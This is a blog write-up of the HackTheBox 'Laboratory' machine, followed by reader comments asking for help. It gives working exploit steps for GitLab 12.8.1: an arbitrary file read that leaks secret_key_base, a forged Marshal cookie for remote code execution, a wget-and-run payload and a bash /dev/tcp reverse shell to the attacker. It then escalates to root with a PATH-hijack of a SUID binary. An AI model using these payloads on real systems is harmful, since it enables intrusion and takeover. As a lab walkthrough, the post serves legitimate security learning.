Hello guys, This my new blog where I'll be posting writeups on HackTheBox machines.
This write-up is for the machine Laboratory, which is created by 0xc45.
It is rated easy, But I would rate the difficulty at 8/10.
This box was very fun and I learned alot,
Without further ado, let's begin,
Foothold :-
Before starting looking around the machine it's always a good habit to add the IP to your host files.
As usual, I'll run an nmap scan and see what info we can get on this machine,
# Nmap 7.80 scan initiated Thu Nov 19 07:04:38 2020 as: nmap -A -oN nmapscans -vvv -p 22,80,443 10.10.10.216 Nmap scan report for laboratory.htb (10.10.10.216) Host is up, received syn-ack (0.27s latency). Scanned at 2020-11-19 07:04:39 EST for 27s PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack Apache httpd 2.4.41 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to https://laboratory.htb/ 443/tcp open ssl/http syn-ack Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: HEAD GET POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: The Laboratory | ssl-cert: Subject: commonName=laboratory.htb | Subject Alternative Name: DNS:git.laboratory.htb | Issuer: commonName=laboratory.htb | Public Key type: rsa | Public Key bits: 4096 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-07-05T10:39:28 | Not valid after: 2024-03-03T10:39:28 | MD5: 2873 91a5 5022 f323 4b95 df98 b61a eb6c | SHA-1: 0875 3a7e eef6 8f50 0349 510d 9fbf abc3 c70a a1ca | -----BEGIN CERTIFICATE----- | MIIE4TCCAsmgAwIBAgIUWcpHILpGTrJgl2qd8bAUHpzVmnkwDQYJKoZIhvcNAQEL | BQAwGTEXMBUGA1UEAwwObGFib3JhdG9yeS5odGIwHhcNMjAwNzA1MTAzOTI4WhcN | MjQwMzAzMTAzOTI4WjAZMRcwFQYDVQQDDA5sYWJvcmF0b3J5Lmh0YjCCAiIwDQYJ | KoZIhvcNAQEBBQADggIPADCCAgoCggIBAL48PMhB8KanqCnLpdhppNVYWJ/lLckS | g+1VIhn1b1p6AjiuSj+HWC5i8dtaJaWypGCDFqrN3+wwy3R/G9J/40+BzRtUoX4E | 4LImI7z5NIVAksBXKl4VxhB+vEJNljrLr3EZM1MmBTFL/2o628IAmKmo7mu+DjZ3 | +iauuRCMsTTmCjzpoBoWzcOO05+dedYCbc3P2gv6Ajc3XONajmEseX3xjHZOmMIf | sN4Wr7s4o/cOhwswjtFxmiE3UKV2q2bHLXtyzy2ch3P7xZCAgtHCjFNmrDyxd5uR | 5SVgIwh0K3BDaoD3mTt7AzIjvT8XJLV46DgeJxGNEQRxqBbKz9JfYoX+dOpK6cq1 | N3/FnEHRn/NDravqOGzFCfuRCBo3O58na+6Seod8qro9O9rbHMqLVt+3RK19Ys8B | q4BBwEAthLBua5gwDIUgzPrVtGE1VvdAadvsPV5OKp3C/BT3SIDgecZoEAEwei1Y | Gx/7uV4+LIQOv+VirsuFrUrZKYEsoWR3TVnN5QijjW6VxJc0CVpjNb0r1hKNLZdt | LyhpqrPHevM/F8QmQ9L4bwlbtn2ZMVgs/jySYZy95QzZ0Pof8cCujEABJNsj8Chp | s36Em00ihwnp64wVqQrGVqkRkminUmEezrAbqmIsMf7kEh+5JR49cBrIVpbzwwE9 | qBCYTk66LFw3AgMBAAGjITAfMB0GA1UdEQQWMBSCEmdpdC5sYWJvcmF0b3J5Lmh0 | YjANBgkqhkiG9w0BAQsFAAOCAgEAPyE779gsfBsAE9R2C3Sdh9IDkknSHA18Mj2M | QMJDREjkdRVFCgsZ1cTo/qMOKGaBh+NkzgTTP4D0w//NADt3B72ihnjVY5cQlAWN | XvhrXYnEFmvoHChDLpbDwk32PstkCoDWXXIzDLx3O0q4u0JojCQkpbKVGlaqMrLs | wOTE/A0f68U+Z8CS5VUX+MSkG4wnsQrrywyGxif0RuuCh9AAuIvmcqy0uSBD70+c | L0bfKKKbz1PEB8tCin69nMZmOFcIC9lbesjaynEvccoHzDp5lhHlUdC+UPHH+xCS | WO1W0rqXvOxd4wdjH95FOrMkvwCbMMLQHYaHuDPS276FTiAPpWaPEB+FJFlfvUk5 | K8bHKu8DuHRFUn45ocM10bWPTv1HunXMTIwVYZlk8sELk2nEnQRU3V6PQaZcZ7ao | Ss4CWb8n3gBUK9tFT7jKtY92tDHVgA4xOJPA+5iaywJv/SHiFZqlg4oUFnVXFqCr | 9UVIxY0lD19kgFtKdZwskf/4hYoUMIc4HDR3smD2mSMA8LM4sGvAcfEQrfyuOTOl | SX1p9J3bFm4KjweThqAHDazDYCuovigGq08M/OoFbyHQzpQknTZH5gXxo3dwUEnO | 1n/rzqnLQaB+668enfCFrbZcuCKHXhRDGVraOLax54JZrnih0EN7Pd03J3yQv1xg | sOJcO+0= |_-----END CERTIFICATE----- | tls-alpn: |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Nov 19 07:05:06 2020 -- 1 IP address (1 host up) scanned in 27.95 seconds
So we find 3 open ports:-
- 22 - ssh
- 80 - http
- 443 - https
Also we find an alternative DNS name i.e. git.laboratory.htb .
Let's add that to our hosts file too and start enumerating.
On visiting laboratory.htb we find a web page,
We also find some potential users, that may be useful later on,
Let's run a directory scan to see if we can find any interesting directories:-
gobuster dir -u https://laboratory.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
-u:- to specify url
-w:- to specify wordlist
-k:- to ignore ssl certificate verification
Well gobuster didn't gave us anything useful, so it's time to check out git.laboratory.htb:-
Ok so we see a sign in page, the first thing I tried was creating a user and logging in to get some information about GitLab,
After registering we are redirected to project dashboard,
After messing around the application for a bit, I found out the version of GitLab in the help tab i.e. Community Edition 12.8.1,
Let's look around the web and see if we can find some exploit or vulnerability about this version,
AAAAAAnd... after tremendous searching and testing for hours, I found a report on hackerone that may work for us here,
So we can perform Arbitrary file read on this application, Steps to perform this is as follows:-
- Create two projects
- Add an issue with the following description:-
- Move the issue two the second project
- The file will be copied to the project
And look at that we see an attachment received back to us,
Now if you follow along the report it tells us how we can make use of arbitrary file read vulnerability to grab secret_key_base from secrets.yml file which is located in /opt/gitlab/embedded/service/gitlab-rails/config/ and use this to perform an RCE on the box.
And we have access to secrets.yml,
secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
Now moving, to perform an RCE we need to setup a same gitlab instance in our local environment and swap our secret_key_base from the one that we just now grabbed.
So let's begin setting up our own instance,
We'll manually install gitlab package using this link
- Download the package
curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bashto install this repository which required to install the package- use dpkg -i to install the package
- replace the secret_key_base in secrets.yml file in our local gitlab instance
- run gitlab-ctl reconfigure
- run gitlab-ctl restart
- Start gitlab-rails console
Upon starting up the console you can see the gitlab version number, just to verify that you have installed the correct version,
Let's begin our exploit, first we'll do a PoC to see if our configurations are in correct place,
request = ActionDispatch::Request.new(Rails.application.env_config) request.env["action_dispatch.cookies_serializer"] = :marshal cookies = request.cookie_jar erb = ERB.new("<%= `echo world > /tmp/helloworld` %>") depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new) cookies.signed[:cookie] = depr puts cookies[:cookie]
We'll run this code in our gitlab-rails console and generate a cookie, then we'll send the cookie using,
curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiWSNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIHdvcmxkID4gL3RtcC9oZWxsb2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--a11dd2137a51d2d4a57b28e2f72019288142c0cf" -k
(Note:- Make sure to add -k tag in the end to disable ssl checks done by curl)
Now perform the same steps as above to grab /tmp/hello file using arbitrary file read,
Now that our PoC is working we can send a payload to receive a reverse-shell back,
request = ActionDispatch::Request.new(Rails.application.env_config) request.env["action_dispatch.cookies_serializer"] = :marshal cookies = request.cookie_jar erb = ERB.new("<%= `wget http://10.10.14.116:8000/rev.sh && chmod +x rev.sh && ./rev.sh` %>") depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new) cookies.signed[:cookie] = depr puts cookies[:cookie]
What we are trying to attempt here is send a rev.sh from our http-server and changing the permission of rev.sh and then executing it.
#!/bin/bash bash -i >& /dev/tcp/10.10.14.116/9001 0>&1
We send the cookie using curl as we did previously and,
We get a reverse-shell back as the user git,
User:-
Now that we are in the machine let's begin our enumeration,
Well our linpeas say's that we are in a Docker container, Look's we need to escape.
We spawned a shell inside the gitlab-rails directory, that indicates that we have access to gitlab-rails console in this machine,
After spending around 2 hours on searching for some way to exploit gitlab-rails console to help us escape the docker container, I found out a way to reset a user's password using the gitlab-rails console.
We can see that using this method we can reset dexter's gitlab password,
gitlab-rails console -e production user = User.where(id: 1).first user.password = 'password' user.password_confirmation = 'password' user.save!
Now let's get back to the gitlab login page and see if we can login with this new password,
Voila!! We are in dexter's account, let's grab those ssh-keys and get into the real machine,
Root:-
Now that we are in the real machine let's begin our enumeration and find out how we can get root privileges,
find / -perm -4000 2>/dev/null
The one particular SUID that stands out to me is /usr/local/bin/docker-security,
Let's take a look and see what this binary holds.
On running the binary there seems to be no output,
Let's debug this binary using ltrace,
(Note:- ltrace is a debugging utility in Linux, used to display the calls a userspace application makes to shared libraries.)
setuid(0) = -1 setgid(0) = -1 system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted <no return ...> --- SIGCHLD (Child exited) --- <... system resumed> ) = 256 system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted <no return ...> --- SIGCHLD (Child exited) --- <... system resumed> ) = 256 +++ exited (status 0) +++
Ahh, we can get root access by exploiting the PATH variable here,
cd /tmp echo "/bin/bash" > chmod chmod 777 chmod echo $PATH export PATH=/tmp:$PATH cd /usr/local/bin/ ./docker-security
And we have root access,
If you enjoyed the write-up feel free to leave me a review on any of my social accounts:-
Discord:- deepansh0xB#9762
Twitter:- https://twitter.com/DeepanshPahwa11
Have a great day!!!
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
ReplyDeletepermission denied
HELP HELP HELP !!!
ReplyDeletedepr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
--2021-01-09 17:25:14-- http://10.10.16.180:8000/rev.sh
Connecting to 10.10.16.180:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55 [text/x-sh]
rev.sh: Permission denied
Cannot write to ‘rev.sh’ (Permission denied).
=> ""
Hey, same error , help plz
DeleteSame here CSPSHIVAM, that message and also this on POC
ReplyDeleteSyntaxError ((irb):23: syntax error, unexpected tSTRING_BEG, expecting do or '{' or '(') │
curl -vvv 'http://git.laboratory.htb/use... │
^ │
(irb):23: syntax error, unexpected tSTRING_BEG, expecting do or '{' or '(' │
...oratory.htb/users/sign_in' -b "experimentation_subject_id=BA...